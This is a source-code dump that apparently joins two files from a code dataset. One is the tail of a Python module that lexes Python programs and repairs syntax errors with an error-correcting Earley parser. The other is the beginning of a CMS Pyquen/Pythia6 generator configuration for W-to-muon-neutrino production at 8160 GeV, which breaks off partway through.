(state.rule.rhs == [] or state.rule.rhs[0] != 'H')):
if state.rule.rhs != []:
return Tree(state.rule.lhs, [state.rule.rhs[0]])
return Tree(state.rule.lhs, [state.rule.lhs.replace('Err_', '')])
return Tree(state.rule.lhs,
[get_helperrr(s) for s in state.back_pointers])
def get_helper(state):
if self.grammar.is_tag(state.rule.lhs) or \
(self.grammar.is_tag(state.rule.lhs.replace('Err_', '')) and \
(state.rule.rhs == [] or state.rule.rhs[0] != 'H')):
return [state]
if state.rule.rhs:
if state.rule.rhs[0] == 'Err_Tag':
return [state]
result = []
for s in state.back_pointers:
result.extend(get_helper(s))
return result
def get_erules(state):
if self.grammar.is_tag(state.rule.lhs):
return [state.rule]
result = [state.rule]
for s in state.back_pointers:
result.extend(get_erules(s))
return result
found_states = []
for state in self.chart[-1]:
if state.is_complete() and state.rule.lhs == "S'" and \
state.sent_pos == 0 and state.chart_pos == len(self.words):
# print(get_helper(state))
candidate = get_helper(state)
used_erules = get_erules(state)
# if any(map(lambda st: "Err" in st.rule.lhs, candidate)):
found_states.append((candidate, used_erules, state.error_count))
# get_helperrr(state).draw()
if found_states:
found_states = sorted(found_states, key=lambda st: st[2])
# cand_parses, used_erls, costs = zip(*found_states)
# print(costs)
# for jst in just_states:
# print(jst)
# for st in elsse:
# get_helperrr(st).draw()
# Return Top N = 10 repairs with lowest cost
return found_states
return None
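# Minimal usage sketch (the grammar path and token string below are
# hypothetical, not taken from the original driver code):
#
#   grammar = ErrorGrammar.load_grammar("python_grammar.txt")
#   parse = ErrorEarleyParse("_NAME_ = _NUMBER_ _NEWLINE_ _ENDMARKER_",
#                            grammar, max_cost=3)
#   parse.parse()
#   if parse.has_parse():
#       tree = parse.get()         # minimum-error parse tree (an nltk Tree)
#       rules = parse.get_rules()  # rules used by that parse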
class Lexer():
"""
Simple lexer for Python programs
"""
def __init__(self, terminals):
self.lexer = get_lexer_by_name("python")
self.terminals = terminals
def lex(self, input_program):
program = input_program
if len(input_program) > 1:
if input_program[-1] != '\n':
program = input_program + '\n'
program = self.remove_comments_and_strings(program)
# Some hacks for random errors
if "’" in program:
program = program.replace("’", "'")
program = self.remove_comments_and_strings(program)
# Clean tabs
all_lines = []
for line in program.split('\n'):
spaces_so_far = 0
if len(line) > 0:
if line[0] in [' ', '\t']:
for char in line:
if char == ' ':
spaces_so_far += 1
elif char == '\t':
spaces_so_far = (spaces_so_far // 4 + 1) * 4
else:
break
all_lines.append(' ' * spaces_so_far + line.lstrip().replace('\t', ' '))
all_lines = list(map(lambda line: list(pygments.lex(line.rstrip(), self.lexer)), all_lines))
all_lines = self.update_indents_stack(all_lines)
all_lines = self.update_spaces_and_nls(all_lines)
all_lines = self.update_tokens(all_lines)
tokens = [tok for line in all_lines for tok in line]
tokens = self.final_cleaning(tokens, False)
return tokens
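# Illustrative note (the input program below is an example chosen here, and
# the exact output depends on final_cleaning): lex() abstracts identifiers,
# numbers and strings to _NAME_, _NUMBER_ and _STRING_ and makes layout
# explicit, so a program like
#
#   def f(x):
#       return x + 1
#
# is tokenized roughly as
#
#   def _NAME_ ( _NAME_ ) : _NEWLINE_ _INDENT_ return _NAME_ + _NUMBER_ _NEWLINE_ _DEDENT_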
def clean_with_lex(self, input_program):
program = input_program
# print(program)
if len(input_program) > 1:
if input_program[-1] != '\n':
program = input_program + '\n'
program = self.remove_comments_and_strings(program)
# Some hacks for random errors
if "’" in program:
program = program.replace("’", "'")
program = self.remove_comments_and_strings(program)
# Store strings for later use
all_strings, all_string_types = self.get_comments_and_strings(input_program, program)
# print(all_strings, all_string_types)
# Clean tabs
all_lines = []
for line in program.split('\n'):
spaces_so_far = 0
if len(line) > 0:
if line[0] in [' ', '\t']:
for char in line:
if char == ' ':
spaces_so_far += 1
elif char == '\t':
spaces_so_far = (spaces_so_far // 4 + 1) * 4
else:
break
all_lines.append(' ' * spaces_so_far + line.lstrip().replace('\t', ' '))
all_lines = list(map(lambda line: list(pygments.lex(line.rstrip(), self.lexer)), all_lines))
all_lines = self.update_indents_stack(all_lines)
all_lines = self.update_spaces_and_nls(all_lines)
all_lines = self.update_tokens_with_actual(all_lines)
tokens = [tok for line in all_lines for tok in line]
tokens = self.final_cleaning(tokens, True)
# Put strings back
# print('-' * 42 + '\n' + input_program + '\n' + '=' * 42 + '\n' + tokens.replace('_NEWLINE_ ', '\n') + '\n' + '*' * 42 + '\n')
if tokens.count("_STRING_") == len(all_strings):
# prev_len = len(tokens.split())
# new_tokens = tokens
for string, stype in zip(all_strings, all_string_types):
if ' ' in string:
string = string.replace(' ', "_white_space_")
tokens = tokens.replace('_STRING_', stype + string + stype, 1)
# print(len(new_tokens.split()), prev_len)
# print(new_tokens.split())
# print(tokens.split())
# if len(new_tokens.split()) == len(tokens.split()):
# tokens = new_tokens
# else:
# tokens = tokens.replace('_STRING_', "\"_some_string_\"")
else:
tokens = tokens.replace('_STRING_', "\"_some_string_\"")
# print('-' * 42 + '\n' + '=' * 42 + '\n' + tokens.replace('_NEWLINE_ ', '\n') + '\n' + '*' * 42 + '\n')
return tokens
def remove_comments_and_strings(self, input_prog):
prog = input_prog.replace("\r\n", "\n")
prog = re.sub(re.compile(r"\\\s*?\n") , "" , prog)
# Temporary replacements
prog = prog.replace("\\\\", "__temporary__")
prog = prog.replace("\\\"", "__double_quote__")
prog = prog.replace("\\\'", "__single_quote__")
prog = prog.replace("__temporary__", "\\\\")
# String and comment replacements
prog = re.sub(re.compile(r"\n\s*#.*?\n") , "\n" , prog)
prog = re.sub(re.compile(r"\"\"\".*?\"\"\"", flags=re.DOTALL) , "__triple_dstring__" , prog)
prog = re.sub(re.compile(r"\'\'\'.*?\'\'\'", flags=re.DOTALL) , "__triple_sstring__" , prog)
in_double_quote = False
in_single_quote = False
in_comment = False
new_prog = ""
for char in prog:
if not in_comment:
if not in_double_quote and not in_single_quote and char == "#":
in_comment = True
new_prog += char
elif not in_double_quote and not in_single_quote and char == "\"":
in_double_quote = True
new_prog += char
elif not in_double_quote and not in_single_quote and char == "\'":
in_single_quote = True
new_prog += char
elif in_double_quote and not in_single_quote and char == "\"":
in_double_quote = False
new_prog += char
elif in_double_quote and not in_single_quote and char == "\'":
new_prog += "__single_quote__"
elif not in_double_quote and in_single_quote and char == "\'":
in_single_quote = False
new_prog += char
elif not in_double_quote and in_single_quote and char == "\"":
new_prog += "__double_quote__"
else:
new_prog += char
else:
if char == "\n":
in_comment = False
new_prog += char
elif char == "\'":
new_prog += "__single_quote__"
elif char == "\"":
new_prog += "__double_quote__"
else:
new_prog += char
prog = new_prog
prog = re.sub(re.compile(r"\"([^(\"|\'|\n)]|\(|\)|\|)*?\"") , "\"__string__\"" , prog)
prog = re.sub(re.compile(r"\'([^(\"|\'|\n)]|\(|\)|\|)*?\'") , "\'__string__\'" , prog)
prog = prog.replace("__triple_dstring__", "\"__string__\"")
prog = prog.replace("__triple_sstring__", "\'__string__\'")
prog = re.sub(re.compile(r"#.*?\n" ) , "\n" , prog)
prog = re.sub(re.compile(r"\n\s+\n" ) , "\n" , prog)
while prog.find('\n\n') >= 0:
prog = prog.replace('\n\n', '\n')
return prog
def get_comments_and_strings(self, input_prog, prog):
strings = []
string_types = []
clean_input_prog = input_prog.replace("\r\n", "\n")
clean_input_prog = clean_input_prog.replace("’", "'")
if len(clean_input_prog) > 1:
if clean_input_prog[-1] != '\n':
clean_input_prog = clean_input_prog + '\n'
clean_input_prog = re.sub(re.compile(r"\\\s*?\n") , "" , clean_input_prog)
clean_input_prog = re.sub(re.compile(r"\n\s*#.*?\n") , "\n" , clean_input_prog)
clean_input_prog = re.sub(re.compile(r"#[^\'\"]*?\n" ) , "\n" , clean_input_prog)
clean_input_prog = re.sub(re.compile(r"\n\s+\n" ) , "\n" , clean_input_prog)
while clean_input_prog.find('\n\n') >= 0:
clean_input_prog = clean_input_prog.replace('\n\n', '\n')
# print("=*" * 42 + "=")
# print(clean_input_prog)
parts = prog.split("__string__")
# print(parts)
while parts:
part = parts.pop(0)
clean_input_prog = clean_input_prog.replace(part, '', 1)
if parts == [] or clean_input_prog == "" or clean_input_prog.split(parts[0]) == []:
break
split_prog = clean_input_prog.split(parts[0])
strings.append(split_prog[0].replace('\n', '_NEWLINE_'))
clean_input_prog = clean_input_prog.replace(strings[-1], '', 1)
if len(clean_input_prog) > 2 and clean_input_prog[:3] == "\"\"\"":
string_types.append("\"\"\"")
elif len(clean_input_prog) > 2 and clean_input_prog[:3] == "\'\'\'":
string_types.append("\'\'\'")
elif len(clean_input_prog) > 0 and clean_input_prog[0] == "\"":
string_types.append("\"")
elif len(clean_input_prog) > 0 and clean_input_prog[0] == "\'":
string_types.append("\'")
else:
string_types.append("\"")
return strings, string_types
def update_indents_stack(self, all_lines):
all_line_tokens = []
lst_token_prev_line = False
fst_token_this_line = False
indents = []
paren_so_far = 0
curly_so_far = 0
square_so_far = 0
for token_list in all_lines:
fst_token = token_list[0]
tok_idx = 0
fst_real_token = token_list[tok_idx]
while fst_real_token[0] in Text and fst_real_token[1].replace(' ', '') == '':
tok_idx += 1
if tok_idx < len(token_list):
fst_real_token = token_list[tok_idx]
else:
break
fst_token_this_line = fst_real_token[0] in Operator and fst_real_token[1] in ['+', '-', '*', '/', '//', '%', '==', '!=', 'in', 'or', 'and'] and (paren_so_far > 0 or curly_so_far > 0 or square_so_far > 0)
fst_token_this_line |= fst_real_token[0] in Punctuation and fst_real_token[1] in [',', '}', ')', ']'] and (paren_so_far > 0 or curly_so_far > 0 or square_so_far > 0)
fst_token_this_line |= fst_real_token[0] in Punctuation and fst_real_token[1] in ['(', '['] and (paren_so_far > 0 or curly_so_far > 0 or square_so_far > 0)
fst_token_this_line |= fst_real_token[0] in Keyword and fst_real_token[1] == 'for' and (paren_so_far > 0 or curly_so_far > 0 or square_so_far > 0)
fst_token_this_line |= fst_real_token[0] in String and lst_token_prev_line and (paren_so_far > 0 or curly_so_far > 0 or square_so_far > 0)
if lst_token_prev_line:
# Checks if previous line ends with an operator, paren etc. and we are within a parenthesis, thus we must not indent
last_line_tokens = all_line_tokens.pop()
if len(last_line_tokens) > 1:
all_line_tokens.append(last_line_tokens[:-1])
all_line_tokens.append(token_list)
elif fst_token_this_line:
# Checks if line starts with an operator and we are within a parenthesis, thus we must not indent
last_line_tokens = all_line_tokens.pop()
if len(last_line_tokens) > 1:
all_line_tokens.append(last_line_tokens[:-1])
all_line_tokens.append(token_list[tok_idx:])
elif fst_token[0] in Text and fst_token[1].replace(' ', '') == '':
this_indent = len(fst_token[1])
if indents == [] and this_indent > 0:
indents.append(this_indent)
all_line_tokens.append([(fst_token[0], '_INDENT_')] + token_list[1:])
elif indents == []:
all_line_tokens.append(token_list[1:])
elif indents[-1] == this_indent:
all_line_tokens.append(token_list[1:])
elif indents[-1] < this_indent:
indents.append(this_indent)
all_line_tokens.append([(fst_token[0], '_INDENT_')] + token_list[1:])
elif indents[-1] > this_indent:
dedents = 0
while indents[-1] > this_indent:
dedents += 1
indents.pop()
if indents == []:
break
all_line_tokens.append([(fst_token[0], '_DEDENT_')] * dedents + token_list[1:])
elif not(fst_token[0] in Text and fst_token[1].replace('\n', '') == '') and \
len(indents) > 0:
all_line_tokens.append([(Text, '_DEDENT_')] * len(indents) + token_list)
indents = []
else:
all_line_tokens.append(token_list)
if len(token_list) > 1:
lst_token = token_list[-2]
for tok in token_list:
if tok[0] in Punctuation and tok[1] == '(':
paren_so_far += 1
elif tok[0] in Punctuation and tok[1] == ')':
paren_so_far -= 1
for tok in token_list:
if tok[0] in Punctuation and tok[1] == '{':
curly_so_far += 1
elif tok[0] in Punctuation and tok[1] == '}':
curly_so_far -= 1
for tok in token_list:
if tok[0] in Punctuation and tok[1] == '[':
square_so_far += 1
elif tok[0] in Punctuation and tok[1] == ']':
square_so_far -= 1
lst_token_prev_line = lst_token[0] in Punctuation and lst_token[1] in ['\\', '{', '(', '[']
lst_token_prev_line |= lst_token[0] in Punctuation and lst_token[1] == ',' and (paren_so_far > 0 or curly_so_far > 0 or square_so_far > 0)
lst_token_prev_line |= token_list[-1][0] in Text and token_list[-1][1] == '\\\n'
lst_token_prev_line |= lst_token[0] in Punctuation and lst_token[1] == ':' and curly_so_far > 0
lst_token_prev_line |= lst_token[0] in Operator and lst_token[1] in ['+', '-', '*', '/', '//', '%', '==', '!=', 'in', 'or', 'and'] and (paren_so_far > 0 or curly_so_far > 0 or square_so_far > 0)
lst_token_prev_line |= lst_token[0] in String and (paren_so_far > 0 or curly_so_far > 0 or square_so_far > 0)
if len(indents) > 0:
all_line_tokens.append([(Text, '_DEDENT_')] * len(indents))
return all_line_tokens
def update_spaces_and_nls(self, all_lines):
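        # Drops pure-whitespace tokens from every line and normalises a trailing
        # newline token to the single placeholder _NEWLINE_.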
def is_space(token):
return token[0] in Text and token[1].replace(' ', '') == ''
all_line_tokens = []
for token_list in all_lines:
token_list_no_spaces = list(filter(lambda tok: not is_space(tok), token_list))
last_token = token_list_no_spaces[-1]
if last_token[0] in Text and '\n' in last_token[1]:
all_line_tokens.append(token_list_no_spaces[:-1] + [(last_token[0], '_NEWLINE_')])
else:
all_line_tokens.append(token_list_no_spaces)
return all_line_tokens
def update_tokens(self, all_lines):
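        # Re-joins imaginary literals that the lexer split (a number token followed
        # by the name 'j') and then abstracts tokens to _NAME_/_NUMBER_/_STRING_
        # placeholders via choose_token_represent.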
all_line_tokens = []
for token_list in all_lines:
new_token_list = []
prev_num = False
for tok in token_list:
if tok[0] in Number:
prev_num = True
else:
if prev_num and tok[0] in Name and tok[1] == 'j':
prev_tok = new_token_list.pop()
tok = (prev_tok[0], prev_tok[1] + 'j')
prev_num = False
new_token_list.append(tok)
new_token_list = list(map(self.choose_token_represent, new_token_list))
all_line_tokens.append(new_token_list)
return all_line_tokens
def choose_token_represent(self, token):
if token[0] in Name and token[1] != '.':
return '_NAME_'
elif token[0] in Number:
return '_NUMBER_'
elif token[0] in String:
return '_STRING_'
return token[1]
def update_tokens_with_actual(self, all_lines):
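        # Same re-joining of imaginary literals as update_tokens, but keeps the
        # concrete lexemes and only abstracts string literals to _STRING_.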
all_line_tokens = []
for token_list in all_lines:
new_token_list = []
prev_num = False
for tok in token_list:
if tok[0] in Number:
prev_num = True
else:
if prev_num and tok[0] in Name and tok[1] == 'j':
prev_tok = new_token_list.pop()
tok = (prev_tok[0], prev_tok[1] + 'j')
prev_num = False
new_token_list.append(tok)
# Abstract String tokens for now. Will insert them back later
new_token_list = list(map(lambda x: '_STRING_' if x[0] in String else x[1], new_token_list))
all_line_tokens.append(new_token_list)
return all_line_tokens
def final_cleaning(self, tokens, is_actual):
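        # Appends _ENDMARKER_, glues back multi-character operators that were split
        # into single tokens, collapses repeated string/newline placeholders, and
        # (for the abstract token stream) replaces anything outside the grammar's
        # terminal set with _UNKNOWN_.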
tokens.append('_ENDMARKER_')
tokens = " ".join(tokens)
tokens = tokens.replace('* *', "**")
tokens = tokens.replace('= =', "==")
tokens = tokens.replace('< =', "<=")
tokens = tokens.replace('> =', ">=")
tokens = tokens.replace('! =', "!=")
tokens = tokens.replace('< <', "<<")
tokens = tokens.replace("> >", ">>")
tokens = tokens.replace('& &', "&&")
tokens = tokens.replace('| |', "||")
tokens = tokens.replace('/ /', "//")
tokens = tokens.replace('+ =', "+=")
tokens = tokens.replace('- =', "-=")
tokens = tokens.replace('/ =', "/=")
tokens = tokens.replace('* =', "*=")
tokens = tokens.replace('>> =', ">>=")
tokens = tokens.replace('<< =', "<<=")
tokens = tokens.replace('&& =', "&&=")
tokens = tokens.replace('!! =', "!!=")
tokens = tokens.replace('// =', "//=")
tokens = tokens.replace('% =', "%=")
tokens = tokens.replace('@', "@ ")
tokens = tokens.replace('@ =', "@=")
tokens = tokens.replace('| =', "|=")
tokens = tokens.replace('& =', "&=")
tokens = tokens.replace('^ =', "^=")
# tokens = tokens.replace(", ;", ";")
tokens = tokens.replace(". . .", "...")
if not is_actual:
tokens = tokens.replace("not in", "not_in")
tokens = tokens.replace("is not", "is_not")
tokens = tokens.replace("- >", "_arrow_")
else:
tokens = tokens.replace("- >", "->")
while tokens.find('_STRING_ _STRING_') >= 0:
tokens = tokens.replace('_STRING_ _STRING_', '_STRING_')
while tokens.find(' : _NEWLINE_ _NEWLINE_ ') >= 0:
tokens = tokens.replace(' : _NEWLINE_ _NEWLINE_ ', ' : _NEWLINE_ ')
while tokens.find('. _NUMBER_') >= 0:
tokens = tokens.replace('. _NUMBER_', '_NUMBER_')
while tokens.find('_NEWLINE_ )') >= 0:
tokens = tokens.replace('_NEWLINE_ )', ')')
while tokens.find('_NEWLINE_ ]') >= 0:
tokens = tokens.replace('_NEWLINE_ ]', ']')
while tokens.find('_NEWLINE_ }') >= 0:
tokens = tokens.replace('_NEWLINE_ }', '}')
# print(tokens.replace('_NEWLINE_ ', '\n'))
if not is_actual:
tokens = " ".join(map(lambda t: t if t in self.terminals else '_UNKNOWN_', tokens.split()))
# print(tokens.replace('_NEWLINE_ ', '\n'))
return tokens
def read_grammar(grammar_file):
grammar = ErrorGrammar.load_grammar(grammar_file)
return grammar
def prog_has_parse(prog, grammar, terminals):
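    # Lexes the program one 'def'-delimited chunk at a time and reports whether
    # every chunk is accepted by the error grammar.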
def run_parse(sentence):
parser = ErrorEarleyParse(sentence, grammar)
parser.parse()
return parser.has_parse(), parser.chart
lexer = Lexer(terminals)
# tokenized_prog = lexer.lex(prog)
# print('-----------------')
# print(tokenized_prog.replace('_NEWLINE_ ', '\n'))
# print('-----------------')
lexed_funs = filter(lambda f: f != '', map(lambda ff: lexer.lex('def ' + ff[1]) if ff[0] > 0 else lexer.lex(ff[1]), enumerate(prog.split('\ndef '))))
for lexed in lexed_funs:
parsed, _ = run_parse(lexed)
if parsed is None:
return False
elif not parsed:
return False
return True
def prog_error_rules(prog, grammar, terminals):
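    # Lexes the whole program, runs the error-correcting Earley parser and returns
    # only the rules that encode repairs (lhs starting with 'Err_' or 'InsertErr').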
def run_parse(sentence):
parser = ErrorEarleyParse(sentence, grammar)
parser.parse()
return parser.get_rules(), parser.chart
lexer = Lexer(terminals)
# alphabet = grammar.get_alphabet()
# print(alphabet)
# tokenized_prog = lexer.lex(prog)
# print('-----------------')
# print(tokenized_prog.replace('_NEWLINE_ ', '\n'))
# print('-----------------')
# lexed_funs = filter(lambda f: f != '', map(lambda ff: lexer.lex('def ' + ff[1]) if ff[0] > 0 else lexer.lex(ff[1]), enumerate(prog.split('\ndef '))))
# error_rules = []
# for lexed in lexed_funs:
# parsed, _ = run_parse(lexed)
# if parsed is None:
# return []
# elif not parsed:
# return []
# # parse = ErrorEarleyParse(lexed, grammar)
# # parse.parse()
# # parse.get().pretty_print()
# error_rules.extend(list(filter(lambda er: er.lhs.startswith('Err_') or er.lhs == 'InsertErr', parsed)))
lexed_prog = lexer.lex(prog)
error_rules = []
parsed, _ = run_parse(lexed_prog)
if parsed is None:
return []
elif not parsed:
return []
# parse = ErrorEarleyParse(lexed_prog, grammar)
# parse.parse()
# parse.get().pretty_print()
# print(parsed)
error_rules = list(filter(lambda er: er.lhs.startswith('Err_') or er.lhs == 'InsertErr', parsed))
# for rule in list(filter(lambda er: er.lhs.startswith('Err_') or er.lhs == 'InsertErr' or any(map(lambda r: r.startswith('Err_') or r == 'InsertErr', er.rhs)), parsed)):
# print(rule)
return error_rules
def lexed_prog_has_parse(lexed_prog, grammar):
def run_parse(sentence):
parser = ErrorEarleyParse(sentence, grammar)
parser.parse()
return parser.get_rules(), parser.chart
error_rules = []
parsed, _ = run_parse(lexed_prog)
if parsed is None:
return []
elif not parsed:
return []
# parse = ErrorEarleyParse(lexed_prog, grammar)
# parse.parse()
# parse.get().pretty_print()
# print(parsed)
error_rules = list(filter(lambda er: er.lhs.startswith('Err_') or er.lhs == 'InsertErr', parsed))
return error_rules
def rule_updates(st):
if st.rule.lhs.startswith('Err_'):
return st.rule.lhs.replace('Err_', '')
elif st.rule.lhs == 'InsertErr':
return None
else:
return st.rule.lhs
def rule_updates_rhs(grammar, st):
if st.rule.lhs.startswith('Err_'):
return grammar[st.rule.lhs.replace('Err_', '')][0].rhs[0]
elif st.rule.lhs == 'InsertErr':
return None
else:
return st.rule.rhs[0]
def rule_updates_repair_operations(grammar, st):
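    # Maps an Earley state to a tagged repair operation: '<<$tok$>>' replaces the
    # offending token, '<<+tok+>>' inserts a missing token, '<<-tok->>' deletes a
    # spurious one; ordinary rules pass their terminal through unchanged.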
if st.rule.lhs.startswith('Err_'):
if st.rule.rhs:
return '<<$' + grammar[st.rule.lhs.replace('Err_', '')][0].rhs[0] + '$>>'
else:
return '<<+' + grammar[st.rule.lhs.replace('Err_', '')][0].rhs[0] + '+>>'
elif st.rule.lhs == 'InsertErr':
return '<<-' + st.rule.rhs[0] + '->>'
else:
return st.rule.rhs[0]
def get_repaired_seq_for_1(rule_sequences, grammar):
rule_seq = sorted(rule_sequences[0], key=lambda st: st.sent_pos)
abstract_fixed_seq = list(filter(lambda x: x, map(rule_updates, rule_seq)))
rul_upd = partial(rule_updates_rhs, grammar)
fixed_seq = list(filter(lambda x: x, map(rul_upd, rule_seq)))
rul_upd_repair_ops = partial(rule_updates_repair_operations, grammar)
fixed_seq_ops = list(filter(lambda x: x, map(rul_upd_repair_ops, rule_seq)))
return (' '.join(abstract_fixed_seq), ' '.join(fixed_seq), ' '.join(fixed_seq_ops), rule_sequences[1], rule_sequences[2])
def fixed_lexed_prog(lexed_prog, grammar, max_cost):
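    # Runs the error-correcting parser (bounded by max_cost) on an already-lexed
    # program and returns, per solution, the abstract fixed sequence, the concrete
    # fixed sequence and the sequence annotated with repair operations.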
def run_parse(sentence):
parser = ErrorEarleyParse(sentence, grammar, max_cost)
parser.parse()
return parser.get_fixed_seq(), parser.chart
parsed, _ = run_parse(lexed_prog)
if parsed is None:
return [(None, None, None, None, None)]
elif not parsed:
return [(None, None, None, None, None)]
return list(map(lambda sol: get_repaired_seq_for_1(sol, grammar), parsed))
def repair_prog(actual_tokens, fix_seq_operations):
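    # Replays the repair-operation sequence against the original token stream:
    # '<<+x+>>' emits x without consuming input, '<<$x$>>' consumes one original
    # token and emits x instead, '<<-x->>' consumes one original token and drops
    # it, while _INDENT_/_DEDENT_/_NEWLINE_ rebuild the indentation and line
    # structure of the repaired source text.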
# Reverse program `actual_tokens` for efficient popping
actual_tkns = actual_tokens
actual_tkns = list(reversed(actual_tkns.split()))
repaired = ""
indents = ''
if " not_in " in fix_seq_operations:
fix_seq_operations = fix_seq_operations.replace(" not_in ", " not in ")
if " is_not " in fix_seq_operations:
fix_seq_operations = fix_seq_operations.replace(" is_not ", " is not ")
for tk in fix_seq_operations.split():
if tk.startswith('<<+'):
if tk[3:-3] == '_INDENT_':
indents += ' ' * 4
repaired += ' ' * 4
elif tk[3:-3] == '_DEDENT_':
indents = indents[4:]
repaired = repaired[:-4]
elif tk[3:-3] == '_NEWLINE_':
repaired += '\n'
repaired += indents
elif tk[3:-3] in ['pass', 'break', 'continue', 'return', 'yield']:
                flag = (repaired[-2] == ':') if len(repaired) > 1 else False
repaired += '\n'
repaired += indents
repaired += (' ' * 4 if flag else '') + tk[3:-3] + " "
elif tk[3:-3] == '_NAME_':
repaired += 'simple_name '
else:
repaired += tk[3:-3] + " "
elif tk.startswith('<<$'):
if actual_tkns:
actual_tkns.pop(-1)
else:
return repaired
if tk[3:-3] == '_INDENT_':
indents += ' ' * 4
repaired += ' ' * 4
elif tk[3:-3] == '_DEDENT_':
indents = indents[4:]
repaired = repaired[:-4]
elif tk[3:-3] == '_NEWLINE_':
repaired += '\n'
repaired += indents
elif tk[3:-3] == '_NAME_':
repaired += 'simple_name '
elif tk[3:-3] in ['pass', 'break', 'continue', 'return', 'yield']:
                flag = (repaired[-2] == ':') if len(repaired) > 1 else False
repaired += '\n'
repaired += indents
repaired += (' ' * 4 if flag else '') + tk[3:-3] + " "
else:
repaired += tk[3:-3] + " "
elif tk.startswith('<<-'):
if actual_tkns:
actual_tkns.pop(-1)
else:
return repaired
elif tk == '_INDENT_':
if actual_tkns:
actual_tkns.pop(-1)
else:
return repaired
indents += ' ' * 4
repaired += ' ' * 4
elif tk == '_DEDENT_':
# Added checks because of problem with 6100+ in test set
# It was popping from the empty list
if actual_tkns:
actual_tkns.pop(-1)
else:
return repaired
indents = indents[4:]
repaired = repaired[:-4]
elif tk == '_NEWLINE_':
if actual_tkns:
actual_tkns.pop(-1)
else:
return repaired
repaired += '\n'
repaired += indents
elif tk == '_ENDMARKER_':
repaired += '\n'
elif tk == '_arrow_':
if actual_tkns:
actual_tkns.pop(-1)
else:
return repaired
repaired += "-> "
elif tk in ['_NAME_', '_STRING_', '_NUMBER_']:
if actual_tkns:
repaired += actual_tkns.pop(-1) + " "
else:
return repaired
else:
if actual_tkns:
actual_tkns.pop(-1)
else:
return repaired
if tk == '[':
repaired += tk
elif tk in ['(', ')', ']', '.', ',', ':'] and len(repaired) > 0:
if tk == ',' or tk == ')' or tk == ':':
repaired = (repaired[:-1] if repaired[-1] == ' ' else repaired) + tk + " "
else:
repaired = (repaired[:-1] if repaired[-1] == ' ' else repaired) + tk
else:
repaired += tk + " "
return repaired
def concretize_seq(seq, grammar):
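    # Expands a sequence of abstract tags back to terminals by taking the first
    # right-hand-side symbol of each tag's grammar rule.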
tags = seq.split()
tokens = [grammar[t][0].rhs[0] for t in tags]
return ' '.join(tokens)
def get_token_list(prog, terminals):
lexer = Lexer(terminals)
return lexer.lex(prog)
def get_actual_token_list(prog, terminals):
lexer = Lexer(terminals)
return lexer.clean_with_lex(prog)
def main():
"""
Main.
"""
parser_description = ("Runs the Earley parser according to a given "
"grammar.")
parser = argparse.ArgumentParser(description=parser_description)
parser.add_argument('draw', nargs='?', default=False)
    parser.add_argument('grammar_file', help="Filepath to grammar file")
parser.add_argument('input_program', help="The input program to parse")
parser.add_argument('--show-chart', action="store_true")
args = parser.parse_args()
grammar = ErrorGrammar.load_grammar(args.grammar_file)
terminals = grammar.get_alphabet()
# grammar.update_error_grammar([')'], [']'])
def run_parse(sentence):
parse = ErrorEarleyParse(sentence, grammar)
parse.parse()
return parse.get_rules(), parse.chart
program_path = Path(args.input_program)
    # # Strip the sentence of any punctuation.
# stripped_sentence = sentence
# for p in string.punctuation:
# stripped_sentence = stripped_sentence.replace(p, '')
input_program = program_path.read_text()
# print(input_program)
lexer = Lexer(terminals)
tokenized_prog = lexer.lex(input_program)
# print(parse(input_program))
# print(asttokens.ASTTokens(input_program, parse=True).tokens)
print(tokenized_prog.replace('_NEWLINE_ ', '\n'))
print('-----------------')
lexed_funs = filter(lambda f: f != '', map(lambda ff: lexer.lex('def ' + ff[1]) if ff[0] > 0 else lexer.lex(ff[1]), enumerate(input_program.split('\ndef '))))
for lexed in lexed_funs:
parsed, _ = run_parse(lexed)
if parsed is None:
print(False)
            continue
elif not parsed:
print(False)
            continue
# print(parsed)
# parsed.pretty_print()
print(True)
# parsed, chart = run_parse(tokenized_prog)
# if args.show_chart:
# print(chart)
# print('\n')
# if parsed is None:
# print(input_program + '\n')
# else:
# if args.draw:
# parsed.draw()
# else:
# print("True")
# # parsed.pretty_print()
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
4fd52351a670070b2a03c71c3135823c46cdb129 | 4526ed71f39d70111c3787ec90b4932a183c452c | /2016/Pyquen_WToMuNu_TuneZ2_8160GeV_pythia6_reverse_cfi.py | f47777dec69a0a32fa2aa7721bb9c36a5c2f145d | [] | no_license | CMS-HIN-dilepton/MCRequest | 773f414739efc529dc957a044232478b1c4f1c03 | ff49d22fde2c4a006fe7fa02d4cf53d794f91888 | refs/heads/master | 2021-05-02T12:16:51.891664 | 2020-06-20T18:35:52 | 2020-06-20T18:35:52 | 45,127,457 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,712 | py | import FWCore.ParameterSet.Config as cms
from Configuration.Generator.PythiaUEZ2Settings_cfi import *
generator = cms.EDFilter("PyquenGeneratorFilter",
comEnergy = cms.double(8160.0),
aBeamTarget = cms.double(208.0),
protonSide = cms.untracked.int32(2),
qgpInitialTemperature = cms.double(1.0), ## initial temperature of QGP; allowed range [0.2,2.0]GeV;
qgpProperTimeFormation = cms.double(0.1), ## proper time of QGP formation; allowed range [0.01,10.0]fm/c;
hadronFreezoutTemperature = cms.double(0.14),
doRadiativeEnLoss = cms.bool(True), ## if true, perform partonic radiative en loss
doCollisionalEnLoss = cms.bool(False),
qgpNumQuarkFlavor = cms.int32(0), ## number of active quark flavors in qgp; allowed values: 0,1,2,3
numQuarkFlavor = cms.int32(0), ## to be removed
doIsospin = cms.bool(True),
angularSpectrumSelector = cms.int32(0), ## angular emitted gluon spectrum :
embeddingMode = cms.bool(False),
backgroundLabel = cms.InputTag("generator"), ## ineffective in no mixing
doQuench = cms.bool(False),
bFixed = cms.double(0.0), ## fixed impact param (fm); valid only if cflag_=0
cFlag = cms.int32(0), ## centrality flag
bMin = cms.double(0.0), ## min impact param (fm); valid only if cflag_!=0
bMax = cms.double(0.0), ## max impact param (fm); valid only if cflag_!=0
pythiaPylistVerbosity = cms.untracked.int32(1),
pythiaHepMCVerbosity = cms.untracked.bool(True),
maxEventsToPrint = cms.untracked.int32(0),
PythiaParameters = cms.PSet(pythiaUESettingsBlock,
processParameters = cms.vstring('MSEL = 0 !User defined processes',
'MSUB(2) = 1 !W production',
'MDME(190,1) = 0 !W decay into dbar u',
'MDME(191,1) = 0 !W decay into dbar c',
'MDME(192,1) = 0 !W decay into dbar t',
'MDME(194,1) = 0 !W decay into sbar u',
'MDME(195,1) = 0 !W decay into sbar c',
'MDME(196,1) = 0 !W decay into sbar t',
'MDME(198,1) = 0 !W decay into bbar u',
'MDME(199,1) = 0 !W decay into bbar c',
'MDME(200,1) = 0 !W decay into bbar t',
